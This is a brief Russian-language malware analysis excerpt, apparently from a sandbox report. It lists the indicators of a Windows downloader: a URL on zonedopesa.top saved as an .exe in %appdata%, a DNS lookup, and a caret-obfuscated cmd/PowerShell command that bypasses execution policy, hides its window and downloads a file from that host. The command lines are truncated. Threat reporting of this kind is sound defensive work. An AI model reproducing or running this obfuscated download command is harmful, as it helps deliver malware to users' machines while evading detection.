Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^W^e^r^SHe^l^l^.^exe^ -ExecuTIoNp^olic^y ByPaS^s -NoP^ro^filE -^wINDOWsT^yl^e ^hI^D^D^En (^n^EW-oB^jECt Sy^ST^EM^.^N^ET^.W^EBC^L^iEnT).D^O^WN^LoADFiL^E('http://www.z...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "P^o^W^e^r^SHe^l^l^.^exe^ -ExecuTIoNp^olic^y ByPaS^s -NoP^ro^filE -^wINDOWsT^yl^e ^hI^D^D^En (^n^EW-oB^jECt Sy^ST^EM^.^N^ET^.W^EBC^L^iEnT).D^O^WN^LoADFiL^E('http://www.z...' (со скрытым окном)